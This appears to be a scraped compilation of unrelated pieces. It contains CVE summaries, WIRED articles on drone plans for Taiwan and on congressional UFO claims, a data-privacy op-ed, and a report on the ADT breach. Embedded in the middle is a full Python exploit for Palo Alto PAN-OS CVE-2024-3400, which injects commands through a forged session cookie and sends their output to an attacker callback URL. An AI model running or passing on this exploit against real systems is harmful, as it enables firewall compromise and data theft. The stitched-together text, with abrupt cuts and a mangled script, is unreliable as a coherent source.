CVE-2021-33327

Insecure defaults in open-source Temporal Server before version 1.20 on all platforms allows an attacker to craft a task token with access to a namespace other than the one specified in the request. Creation of this task token must be done outside of the normal Temporal server flow. It requires the namespace UUID and information from the workflow history for the target namespace. Under these conditions, it is possible to interfere with pending tasks in other namespaces, such as marking a task failed or completed.
If a task is targeted for completion by the attacker, the targeted namespace must also be using the same data converter configuration as the initial, valid, namespace for the task completion payload to be decoded by workers in the target namespace.





CVE-2023-3485: Release v1.20.0 · temporalio/temporal

The US Defense Department’s grand strategy for protecting Taiwan from a massive Chinese military offensive involves flooding the zone with thousands of drones.

It has become conventional wisdom among the halls of the United States government that China will launch a full-scale invasion of Taiwan within the next few years. And when that happens, the US military has a relatively straightforward response in mind: Unleash hell.

Speaking to The Washington Post on the sidelines of the International Institute for Strategic Studies’ annual Shangri-La Dialogue in June, US Indo-Pacific Command chief Navy Admiral Samuel Paparo colorfully described the US military’s contingency plan for a Chinese invasion of Taiwan as flooding the narrow Taiwan Strait between the two countries with swarms of thousands upon thousands of drones, by land, sea, and air, to delay a Chinese attack enough for the US and its allies to muster additional military assets in the region.

“I want to turn the Taiwan Strait into an unmanned hellscape using a number of classified capabilities,” Paparo said, “so that I can make their lives utterly miserable for a month, which buys me the time for the rest of everything.”

Cheap, easily weaponizable drones have transformed battlefields from Ukraine to the Middle East in recent years, and the US military is rapidly adapting to this new uncrewed future. While Paparo isn’t the first to invoke the image of a robotic “hellscape” with regards to Taiwan (his predecessor, Admiral John Aquilino had previously used the term in August 2023), his comments offer the most vivid description of the Defense Department’s plan for dealing with Chinese aggression toward the US ally. In recent months, new details have started to draw out the contours of what, exactly, this “hellscape” would look like.

**A Great Wall of Drones**

China has undertaken a major military buildup ahead of what American defense leaders see as an imminent attempt to annex Taiwan, which Beijing sees as a breakaway province. According to a June analysis from the Center for Strategic & International Studies, the People’s Liberation Army Navy now boasts the largest maritime force on the planet, with 234 warships to the US Navy’s fleet of 219; testifying before the Senate Armed Services Committee in March, then-INDOPACOM boss Aquilino stated that the PLA Air Force also now has the largest number of warplanes in the region (not counting uncrewed systems), with designs on soon surpassing the US and Russian air fleets.

While the exact size of the Chinese military’s arsenal of uncrewed vehicles is difficult to estimate, the country has become the leading exporter of armed combat drones around the world over the past decade (along with Turkey), according to data from the Stockholm International Peace Research Institute. And when it comes to the consumer drones that are converted into weapons of war by soldiers on the front lines, Chinese drone giant Da-Jiang Innovations (better known in the US as DJI) controls three-quarters of that market, according to The Wall Street Journal. While the US and China may appear locked in an military drone arms race, the latter currently possess a significant advantage.

“China has essentially copied all of the large and medium high-altitude drones the US has and produced what amount to cheaper versions of the MQ-9 Reaper or the \[RQ-4\] Global Hawk,” Stacie Pettyjohn tells WIRED. A senior fellow and director of defense programs at the Center for a New American Security, Pettyjohn is the lead author of the June report “Swarms Over the Strait” on the role of drones in a future conflict over Taiwan. “Potentially more concerning is the smaller drones that don’t have to fly as far and can be launched from mainland China, of which the Chinese military has many.”

Simply put, China has a lot of drones and can make a lot more drones quickly, creating a likely advantage during a protracted conflict. “This stands in contrast to American and Taiwanese forces, who do not have large inventories of drones or the right mix of drones to successfully defeat a Chinese invasion,” Pettyjohn and her coauthors write in the CNAS report.

Apart from beefing up Taiwan’s counter-drone defenses, the Pentagon’s “hellscape” plan proposes that the US military make up for this growing gap by producing and deploying what amounts to a massive screen of autonomous drone swarms designed to confound enemy aircraft, provide guidance and targeting to allied missiles, knock out surface warships and landing craft, and generally create enough chaos to blunt (if not fully halt) a Chinese push across the Taiwan Strait. Networked drones will not just strike adversaries but also provide critical intelligence, surveillance, and reconnaissance functions to fill the gaps between satellite imaging and crewed overflights, ostensibly allowing the US and its allies to develop a more complete picture of the battlefield as it evolves.

“A 2020 Rand Corporation report concludes that hundreds of networked, low-cost drones could guide American long-range anti-ship missiles toward a Chinese invasion fleet and would be a key capability needed to defeat China and successfully defend Taiwan,” the CNAS report says. “Similarly, proponents of air denial strategy argue that using ‘sufficiently large numbers of smaller, cheaper weapons,’ including ground-based air defenses and drone swarms, ‘in a distributed way’ would prevent China from gaining air superiority.”

As Pettyjohn points out to WIRED, the concept of Taiwan using densely layered defenses to inflict incredibly high losses on an invading Chinese force isn’t new, with past visions of a “porcupine strategy” built on missiles and mines as deterrents to an outright invasion. But the incorporation of massive drone fleets adds a new layer to the fight. Indeed, war games conducted by the US Air Force and defense think tanks like Rand over the past several years have pointed to the critical role drone swarms could play in potentially thwarting an invasion of Taiwan.

According to the CNAS report, this strategy appears to have been sharpened by recent lessons from Russia’s invasion of Ukraine, where the Ukrainian military has successfully deployed drones against the superiorly numbered and equipped Russian force to disrupt enemy formations, destroy armored vehicles, and even neutralize surface combatants. Look no further than the Black Sea, where Ukrainian forces have managed to destroy 26 Russian vessels and forced Moscow’s vaunted Black Sea Fleet to a safe harbor hundreds of miles away using missiles, kamikaze UAVs, and explosive-laden drone boats.

The CNAS report makes several recommendations for how the Pentagon can best employ drones to defend Taiwan, emphasizing the need to build a “diverse” fleet of UAVs encompassing “a mix of higher-end and cheaper systems” (the large and expensive Reaper versus low-cost single-use kamikaze drones, for example), investing in the development of autonomous drone boats for attacking larger surface warships, and pre-positioning short- and medium-range drones on Taiwan for a rapid, immediate response to a Chinese invasion.

“In addition to acquiring ‘good enough’ long-range drones for target acquisition and strike, the United States should have a smaller number of stealthy drones that can conduct surveillance in highly contested airspace and provide targeting information for standoff missile strikes,” the report says, adding that “affordable kamikaze drones with relatively simple autonomy could overwhelm the Chinese navy’s air defenses and damage or destroy the invasion fleet.”

**Engage the Replicator**

With a potential invasion looming, the Pentagon has kicked efforts to make its vision of a “hellscape” into high gear. Last August, deputy secretary of defense Kathleen Hicks announced the department’s new Replicator initiative, designed to build and field “attritable autonomous systems”—DOD-speak for disposable, AI-enabled drones—“at scale of multiple thousands, in multiple domains” within the next 18 to 24 months. As of March, the Pentagon had earmarked $1 billion across its fiscal-year 2024 and 2025 budgets for its first round of Replicator systems, as USNI News reported.

Replicator appears to be doing its job already. In May, the Pentagon announced its first tranche of fresh capabilities, which includes the accelerated fielding of more than 1,000 of defense contractor AeroVironment’s Switchblade-600 loitering munitions—a man-portable missile that circles over targets before dive-bombing them at the right moment—in the next year, as well as the procurement of uncrewed “interceptor” surface vessels under the department’s new Production-Ready, Inexpensive, Maritime Expeditionary (Prime) effort. According to a DOD solicitation released in January, the Prime drone boats will purportedly be capable of “autonomously transiting hundreds of miles through contested waterspace, loitering in an assigned operating area while monitoring for maritime surface threats, and then sprinting to interdict a noncooperative, maneuvering vessel.” The first Replicator systems were already deployed to the Indo-Pacific, according to Hicks, with some military units training with cheap drones produced under the initiative as of August.

"This is just the beginning," Admiral Christopher Grady, vice chairman of the Joint Chiefs of Staff, said in a May statement. "Replicator is helping us jump-start the delivery of critical capabilities at scale.

Replicator isn’t the US military’s only effort to incorporate uncrewed weapons platforms into its formations. The Army has asked for $120.6 million as part of its fiscal-year 2025 budget request for Low Altitude Stalking and Strike Ordnance (Lasso) semiautonomous loitering munitions to outfit infantry brigade combat teams with the capability. As of April, the Marine Corps has selected three defense contractors (AeroVironment, defense upstart Anduril, and Teledyne FLIR) to compete for a potential $249 million contract to furnish Marines with so-called Organic Precision Fires-Light kamikaze drone swarms (to say nothing of the Corps’ push to acquire Long Range Attack Missile air-launched loitering munition). US Special Operations Command, an early adopter of loitering munitions, now wants to outfit its fleet of aircraft with air-launched systems. And as for the maritime realm, the Marine Corps has been experimenting with uncrewed surface vessels bristling with Uvision Hero-120 kamikaze drone launchers, while the Navy has been eyeing missile-hauling drone boats as potential escorts for transport ships, among other lethal initiatives, after years of experimenting with uncrewed surface vessels as waterborne sensor nodes.

Beyond expanding its arsenal of uncrewed systems, the US is also working to bolster Taiwan’s own drone capabilities. In June, the State Department announced the approval of a $360 million weapons sale to Taipei that included 291 ALTIUS 600M-V kamikaze drones produced by Anduril and 720 Switchblade-300 loitering munitions. As the CNAS report notes, the integration of these one-way attack drones into Taiwanese military formations, when deployed in conjunction with explosive-laden drone boats and anti-ship missiles, could potentially prevent Chinese warships from ever reaching the country’s shores in a similar manner to how Ukrainian forces have denied the Russian military control over the Black Sea.

“Taiwan needs a lot of these systems and needs them quickly to incorporate them into broader tactics and formations” as effectively as the Ukrainians have, Pettyjohn says.

And this is just the beginning: The Taiwanese government plans to procure nearly 1,000 additional AI-enabled attack drones in the next year, according to Taipei Times, with long-standing plans to expand indigenous production of homegrown capabilities to prevent backlogs in weapons transfers from the United States—and, more importantly, ease reliance on Chinese-made commercial off-the-shelf parts. (Although, as Pettyjohn points out, the Taiwanese defense community itself isn’t totally unified around the “hellscape” plan in the first place.)

Access to commercial drones “is where Taiwan is most disadvantaged” because of DJI’s relative dominance of the market, Pettyjohn says, noting that “even if Taiwan had Chinese drones available to them, they would have to hack in to each system to ensure they can’t be tracked by DJI or don’t have similar vulnerabilities.”

“Consider that for most of the first-person-view kamikaze drones used in Ukraine right now, all of those components are sourced from China,” she adds. “Even Ukraine has tried to wean itself off Chinese sources and hasn’t found anything at a comparable price point.”

**Mass-Producing Hell**

Planning a “hellscape" of hundreds of thousands of drones is one thing, but actually making it a reality is another. An April 2023 assessment from the Rand Corporation indicated that rising demand for weaponized drones would likely “strain” the capacity of the existing US defense industrial base. Similarly, a separate CNAS report from June 2023 argued that the war in Ukraine (and the US government’s role as a major provider of security assistance to Kyiv) has “shed light on serious deficiencies” in the Pentagon’s ability to rapidly scale production of “key weapons” like precision-guided munitions compared to Russia—a problem echoed in the most recent CNAS report’s assessment of the US government’s approach to Taiwan’s defense.

“Ukraine consistently has pioneered new approaches to drone warfare, but Russia has rapidly adapted and scaled drone production in a way that Ukraine cannot match,” the June 2024 CNAS report says. “Technological and tactical innovations are necessary but not sufficient. Mass production of an affordable mix of drones is also needed to support a large and likely protracted conflict.”

The report adds that the US defense industrial based may not be “ currently capable of producing the quantities of drones needed for a war with China.”

Like Russia, China’s autocratic regime has enabled the country’s defense industrial base to rapidly accelerate weapons R&D and production, so far that Beijing is “heavily investing in munitions and acquiring high-end weapons systems and equipment five to six times faster than the United States,” as a March comparison from CSIS put it. By contrast, the US defense industrial ecosystem has over the past several decades consolidated into a handful of large “prime” contractors like Lockheed Martin and Raytheon, a development that threatens to not only stifle innovation but hamstring the production of critical systems needed for the next big war.

“Overall, the US defense industrial ecosystem lacks the capacity, responsiveness, flexibility, and surge capability to meet the US military’s production and war-fighting needs,” the CSIS report says. “Unless there are urgent changes, the United States risks weakening deterrence and undermining its war-fighting capabilities.”

To that end, the latest CNAS report recommends that the Pentagon and Congress work to foster both the commercial and military drone industrial base “to scale production and create surge capacity” to quickly replace drones lost in a future conflict. While the Pentagon has, with regards to Ukraine, relied on multi-year and large-lot procurement programs to source munitions from large “primes” and “\[provide\] industry with the stability it needs to expand production capacity,” as the 2023 CNAS report put it, the Replicator initiative is explicitly designed to not only further provide that stability to drone makers but also to pull in “nontraditional” defense industry players—startups like Anduril or drone boat maker Saronic, the latter of which recently received $175 million in Series B funding to scale up its manufacturing capacity.

Replicator “provides the commercial sector with a demand signal that allows companies to make investments in building capacity, strengthening both the supply chain and the industrial base,” according to the Defense Innovation Unit, the Pentagon organ responsible for capitalizing on emerging commercial technologies. “Replicator investments incentivize traditional and non-traditional industry players to deliver record volumes of all domain attritable autonomous systems in line with the ambitious schedule set forth by the deputy secretary of defense.”

“It comes down to contracts,” Pettyjohn says. “Where Replicator is potentially most impactful is where the Pentagon buys something they keep for a few years before they get something new for a different mission set so the DOD isn’t keeping a system in their inventory for decades. Establishing those practices, getting those contracts out there, and getting enough money into it so there’s competition and resiliency within industry is really needed to fuel innovation and provide the capabilities that are needed.”

It’s unclear whether the United States will actually be ready to defend Taiwan when the moment arrives; as legendary Prussian military commander Helmuth von Moltke is famously quoted as saying, “no plan survives first contact with the enemy.” But with the right preparation, funding, and training (and a little luck), the Pentagon and its Taiwanese partners may end up successfully throwing a wrench in China’s suspected invasion plans by flooding the zone with lethal drones. War is hell, but when the next big conflict in the Indo-Pacific rolls around, the US wants to guarantee that it will be an absolute hellscape—for the Chinese military, at least.

The Pentagon Is Planning a Drone ‘Hellscape’ to Defend Taiwan

Fresh claims from a former US intelligence officer about an “intact” alien craft may get traction on Capitol Hill, where some lawmakers want to believe.

The United States Congress is strange enough without aliens, but here we are. Or is it, here they are?

Over a span of several months, members of the 118th Congress have gone from being transfixed by wind-propelled spy balloons to being mesmerized by a whistleblower’s claims that US intelligence officials possess “intact and partially intact non-human aircraft.” The whistleblower, former intelligence officer David Grusch, also claims that this and other evidence are being withheld from Congress.

“The allegations themselves are breathtaking,” says Senator Brian Schatz, a Hawaii Democrat. “It could be a game changer, or it could be a crank. I just don't know.”

Whether Grusch proves to be a crank or a game changer will likely soon be investigated by lawmakers from both parties and in both chambers of Congress. Skeptics abound, but there are also lawmakers who are curious and open to proof. Then there are the believers. 

In our strange new political universe of alternative facts turned dystopian reality, once-fringe notions have built-in fan bases in today’s Capitol. And in the House of Representatives, party leaders tapped Grusch’s allies to lead their chamber’s investigation.

On one level, it’s fitting that today’s conspiracy-laced Congress—where anti-vaxxers berate scientists, Election 2020 remains disputed, and January 6 rioters are praised as victims—is now tasked with tackling arguably the nation’s most long-standing conspiracy. But many senators fear their House counterpart’s melding of “deep state” with deep space will only sow more confusion into an electorate hungry for answers, which hearings about unidentified aircraft in recent years have failed to satisfactorily answer.

The Rank and File Are Flying the UAP

The sensational details of Grusch’s claims about so-called unidentified anomalous phenomena (or UAPs—NASA’s new name for UFOs) spread rapidly through the Capitol last week, along with much derision and mockery. Some congressional leaders laughed them off. "This is not a question I had on my bingo card,” House Democratic Caucus chair Pete Aguilar told the press corps. Or they slid these latest ET allegations right into their old talking points. "Obviously, we're concerned about Congress being kept in the dark from a lot of these agencies,” House majority leader Steve Scalise replied before even seeing the whistleblower’s claims.

The response was different among rank-and-file lawmakers, especially in the House, where the Grusch’s unvetted claims were seen as vindication by a small but vocal—and increasingly powerful—faction of far-right lawmakers who are heading up the inquiry ahead of a planned but still unscheduled hearing.

“I think it’s a little bit of madness and a whole lot of reality. I do believe we’ve recovered a craft at some point,” Representative Tim Burchett, a Tennessee Republican, told Steve Bannon on his podcast Wednesday. Burchett believes that the Pentagon’s budget is bloated, in part, because it’s funding secret UAP programs. His personal belief in UAPs stems from the 1947 incident in Roswell, New Mexico.  

When Grusch’s report dropped, some members of today’s far-right immediately suspected it was a false flag planted by the deep state. “We kind of felt, with everything going on, this is like the biggest misdirection play in history,” Bannon told Burchett. Their fears appear to have largely dissipated, however, with Burchett and his far-right allies now all-in on the investigation.  

Burchett told Bannon he “has a commitment” from both House speaker Kevin McCarthy and House Oversight Committee chair James Comer to hold a hearing on UAPs, though he says it’s not a top priority for party leaders. “We’re only going to get about one bite at the apple,” Burchett said.

If the Pentagon—which vigorously denies the whistleblower’s charges of a secret UAP program—or NASA officials ask to brief lawmakers behind closed doors, which is common when classified information is discussed, Burchett’s not interested. “I'm not gonna be a part of it if it's classified. That's ridiculous,” Burchett said on the podcast. “That's just more of the same and creates more myths and rumors than it creates facts.”

Burchett is joined by two Florida Republican representatives: Matt Gaetz—“I have seen evidence of craft that I am not familiar with any of our allies or adversaries or even our country possessing”—and Anna Paulina Luna, who believes the government has been lying to the public about UAP’s “for decades.”

While Luna and Burchett will likely head up the House inquiry and eventual hearing, it’s not just fringe-right members whose ears perked up over these allegations. This includes Representative Mike McCaul, a Texas Republican and chair of the House Foreign Affairs Committee. “It’s a legitimate issue. On both sides, we just want to know if we've been seeing \[UAPs\] that are not man-made—is what the article said, but I don't know,” he says. “But that's a good question for the chairman” of the House Permanent Select Committee on Intelligence.

That’s why one of McCaul’s first reactions to the article was to forward it to the House Intelligence Committee chair, Mike Turner, whose office didn’t reply to multiple requests for comment.

The Senate Has Questions  

The Senate has also shown interest in UAPs in recent years, and the increased pressure on federal officials has produced results—including a massive spike in the number of UAPs the government monitors.   

In its June 2021 report, the Office of the Director of National Intelligence disclosed 144 UAP sightings stretching back nearly two decades. After years of mounting smartphone evidence, unanswered questions, and frustrated lawmakers, the military unveiled its newly rebooted and renamed All-Domain Anomaly Resolution Office (AARO; pronounced “arrow”). 

With a department mandated with tracking secrets in the skies, sightings skyrocketed. Last August, AARO officials disclosed more than 500 reports of UAPs. By this April, there were some 650 cases. And just last month, the Pentagon, which oversees AARO, hiked the number to roughly 800 mysterious flying objects. 

While Grusch’s claims of alien life and recovered craft have made headlines, senators are alarmed by accusations that the federal government is hiding Special Access Programs from Congress.

“We need to just look into whether there are rogue SAP programs that no one is providing oversight for,” says Senator Kirsten Gillibrand, a New York Democrat who led the Senate’s April UAP hearing. “The goal for me will be to have a hearing on that at some point so that we can assess if these SAP’s actually exist.”

Gillibrand is sponsoring an amendment she hopes to attach to this year’s must-pass National Defense Authorization Act to mandate that no money can be spent on SAP’s unless it's been reported to Congress. “So if there are SAPs out there that are somehow outside of the normal chain of command and outside the normal appropriations process, they have to divulge that to Congress,” Gilibrand says.

As for whether she thinks there’s any veracity to the whistleblower’s claims? “I have no idea,” Gillibrand says. “So I'm going to do the work and analyze it and figure it out.”

Other senators say there isn’t much to figure out. “Generally, I would look skeptically at many of these reports,” says Senator Martin Heinrich, a New Mexico Democrat who serves on the Intelligence Committee. While Heinrich remains dubious of the whistleblower, he says UAPs are a conundrum the federal government must address.

“What I take seriously is sometimes we just have these really good, decorated pilots and navigating officers who are experiencing things that we can't explain, so we need to collect data so that we can figure out what is going on,” Heinrich says.

Still, among other senators, radio silence. WIRED sent an inquiry to Senate Intelligence Committee chair Mark Warner; in less than a minute, the Virginia Democrat’s staff replied, “We’re a no comment on this—thank you!”

When we caught the senator in the Capitol’s marble halls, Warner kept tripping over his own thoughts. “There's been a lot of incoming. Frankly, I just need to find out more information on this,” Warner says.

As for the accusation that the federal government has lied to Congress and hidden some SAPs for decades?  “We've heard these accusations before,” Warner says, before stopping himself, again. “Let me get some information first.”

“None of It’s Good”

Lawmakers are still awaiting more answers on the spy balloons that dominated the news—and American air space—at the start of the year, especially in regard to the four objects the Air Force shot down within an eight-day period this February. In the wake of those military engagements, the Biden administration held closed-door classified briefings for members of Congress, but they were less than straightforward, at least initially, until lawmakers pushed officials on UAPs.

“They were talking about the balloons, and then several senators pointed out, ‘Now hold on: We’ve had a lot of unidentified anomalous phenomenon for years now,’ and that’s when the military briefer was like, ‘True. True,’” says Senator Josh Hawley, a Missouri Republican. “The takeaway from that is, they had thousands of sightings of these things over the years, which was news to me. So I'm not surprised, necessarily, by these latest allegations, because it sounds pretty close to what they kind of grudgingly admitted to us in the briefing.”

While not necessarily surprised by Grusch’s claims, lawmakers of all stripes are disturbed by reports of UAPs hovering over US military sites.

“It’s not good. None of it’s good,” Hawley says. “I think we want to get to the bottom of this. I think it’s disturbing.”

UFO Whistleblower, Meet a Conspiracy-Loving Congress

As consumers catch on to the dangers, protection could become a major topic for legislative bodies.

It's no longer a case of _if_ but _when_ a data breach will occur — and consumers are catching on. In the age of digital services, this is a critical development because it means the average US consumer is now demanding the power to make more informed decisions about the way their data is used, stored, and processed. And for US legislative bodies, it means data protection could soon be a major topic on the ballot.

According to the latest Thales Consumer Digital Trust Index, almost half (48%) of US consumers report being victims of a data breach — higher than their global counterparts, at 33%. The sheer volume of cyberattacks in the US has brought data security to the mainstream eye, and consumers are tuning into the legal fallout from breaches affecting millions, including T-Mobile's 2021 cyberattack and Drizly's 2020 hack. Now, they are starting to make more informed decisions about how they want their data handled going forward.

**The Public Is Taking Data Security into Their Own Hands**

Breaches and ransomware attacks have dominated headlines and news cycles, and one in 20 victims reported first hearing about a breach affecting them on the news. Eleven percent of those companies took up to six months to inform consumers about a data breach — a failure on the part of the companies in question.

This pattern of weak transparency has driven consumers to take security matters into their own hands, as they realize inaction is not an option. Just over a fifth have stopped using a company that suffered a data breach, with a large portion of those requesting the company delete their information altogether, while others are keeping a closer eye on their accounts for suspicious activity (21%).

These actions show that data security is a priority for consumers, and it's good practice for organizations to enable them to share this responsibility, in part. Allowing for extra security measures on digital accounts, such as two-factor authentication (2FA), gives consumers more of a sense of control over their information — and that peace of mind is a key element in building trust.

**Paying a Fine Is Not Enough**

As for what they expect from companies that fail to keep their data secure, financial compensation is a natural consequence. Of surveyed consumers, 53% believe companies should offer compensation to victims, but, when it comes to overseeing regulations, only 31% believe companies should receive large fines for breaches, meaning it is far from the biggest priority from a consumer perspective. What more consumers want is better data security measures — not big payouts.

However, the methods consumers believe should be used differ. More than half believe companies should be forced into mandatory data protection controls following a breach. This includes encryption and 2FA, which have long been favored options. And just under half believe companies should be subject to more stringent regulation — for example, being monitored for 12 to 14 months post-breach. Others believe companies should be required to employ more cyber specialists — but the reigning feeling is that regulatory oversight would be a major improvement.

**We're Looking to the Future of US Data Privacy and Security**

One possible contender for that oversight is the American Data Privacy and Protection Act (ADPPA). Similar to the European Union's General Data Protection Regulation (GDPR), which put in place necessary guidelines for European consumer data, ADPPA is a landmark US federal privacy proposal that could potentially meet sweeping demands for security and privacy. Proposed in July 2022, it could also face a number of barriers, including tension between federal and state privacy rights and blowback from tech giants.

While we wait to hear about the progression of this legislation, it is increasingly clear that if it does not become law in the near future, something will have to provide that modicum of oversight. To fully realize what kind of change will be effective, it is important to understand consumer perceptions around data security in the US, and for organizations to provide more visible safeguards in their digital services, in the meantime.

In a digital world, data privacy and security cannot take a backseat. With GDPR leading as example, there is not only a need for similar federal legislation in the US, but a calling for it from US consumers who are tired of finding out they are victim of another breach, leak, or attack. They are ready to take data protection seriously, and it is time we see some federal defenses put in place.

Data Security Concerns Are Driving Changes in US Consumer Behavior and Demands

An issue was discovered in the SportsTeams extension for MediaWiki before 1.35.12, 1.36.x through 1.39.x before 1.39.5, and 1.40.x before 1.40.1. SportsTeams: Special:SportsManagerLogo and Special:SportsTeamsManagerLogo do not check for the sportsteamsmanager user right, and thus an attacker may be able to affect pages that are concerned with sports teams.

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2023-45370

Home surveillance provider ADT just announced they suffered a data breach and cybercriminals are already leaking the data

Electronic surveillance equipment provider ADT filed a form 8-K with the Security and Exchange Commision (SEC) to report “a cybersecurity incident during which unauthorized actors illegally accessed certain databases containing ADT customer order information.”

An 8-K is a report of unscheduled material events or corporate changes at a company that could be of importance to the shareholders or the Securities and Exchange Commission (SEC).

ADT filed the 8-K on August 7, adding that the incident happened “recently,” but refraining from providing an exact date. The company also did not provide an exact number of victims—only that the victims were personally notified about the breach.

Away from ADT’s official disclosures, on July 31, a cybercriminal with the handle “netnsher” announced the leak of a database purportedly belonging to ADT. According to the cybercriminal’s post:

Post announcing a leaked database

> “The infamous security company ADT with $5B revenue suffered a databreach exposing over 30,812 records including 30,400 unique emails, the records contain: CustomerEmail, Full address, User ID, Products bought, etc….”

According to ADT, the stolen data included:

*   Email addresses
*   Phone numbers
*   Home addresses

The company also added that:

> “Based on its investigation to date, the Company has no reason to believe that customers’ home security systems were compromised during this incident.”

The leak announcement by netnsher promises 30,812 records including 30,400 unique email addresses and “Products bought.”

Although ADT does not believe the attackers stole customers’ credit card data or banking information, that last addition might make the database valuable for burglars. But phishing operations might also use the information to their advantage.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Malwarebytes has a free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Security company ADT announces security breach of customer data 

Palo Alto PAN-OS versions prior to 11.1.2-h3 command injection and arbitrary file creation exploit.

    # Exploit Title: Palo Alto PAN-OS  < v11.1.2-h3  - Command Injection and Arbitrary File Creation# Date: 21 Apr 2024# Exploit Author: Kr0ff# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400# Software Link: -# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 #          PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1#          PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1# Tested on: Debian# CVE : CVE-2024-3400#!/usr/bin/env python3import systry:    import argparse    import requestsexcept ImportError:    print("Missing dependencies, either requests or argparse not installed")    sys.exit(2)# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis # https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/def check_vuln(target: str, file: str) -> bool:    ret = False        uri = "/ssl-vpn/hipreport.esp"        s = requests.Session()    r = ""        headers = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0                "Content-Type": "application/x-www-form-urlencoded",                "Cookie": \                        f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"    }         headers_noCookie = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0    }        if not "http://" or not "https://" in target:        target = "http://" + target           try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTP\" !{e}")        print("Trying with \"HTTPS\"...")        target = "https://" + target        try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTPS\"")            sys.exit(1)    else:        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )    if r.status_code == 200:        r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )        if r.status_code == 403:            print("Target vulnerable to CVE-2024-3400")            ret = True    else:        return ret    return ret        def cmdexec(target: str, callback_url: str, payload: str) -> bool:    ret = False    p = ""    if " " in payload:        p = payload.replace(" ", "${IFS)")    uri = "/ssl-vpn/hipreport.esp"    headers = {                "User-Agent" : \                        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0                "Content-Type": "application/x-www-form-urlencoded",                "Cookie": \                        f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`"            }     s = requests.Session()    r = ""        if not "http://" or not "https://" in target:        target = "http://" + target           try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTP\" !{e}")        print("Trying with \"HTTPS\"...")        target = "https://" + target        try:            r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )        except requests.exceptions.Timeout or requests.ConnectionError as e:            print(f"Request timed out for \"HTTPS\"")            sys.exit(1)    else:        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )    if not "Success" in r.text:        return ret    else:        ret = True    return ret#Initilize parser for argumentsdef argparser(selection=None):    parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )        subparser = parser.add_subparsers( help="Available modules", dest="module")        exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")    exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )    exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )    exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )    #---------------------------------------    check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )    check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )    check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )    args = parser.parse_args(selection)    args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])        if args.module == "exploit":            cmdexec(args.target, args.callbackurl, args.payload)    if args.module == "check":        check_vuln(args.target, args.filename)if __name__ == "__main__":    argparser()    print("Finished !")

Palo Alto PAN-OS Command Execution / Arbitrary File Creation

Hyperledger Fabric 2.3 allows attackers to cause a denial of service (orderer crash) by repeatedly sending a crafted channel tx with the same Channel name. NOTE: the official Fabric with Raft prevents exploitation via a locking mechanism and a check for names that already exist.

Signed-off-by: Vladyslav Kopaihorodskyi vlad.kopaygorodsky@gmail.com

**Type of change**

*   Bug fix

**Description**

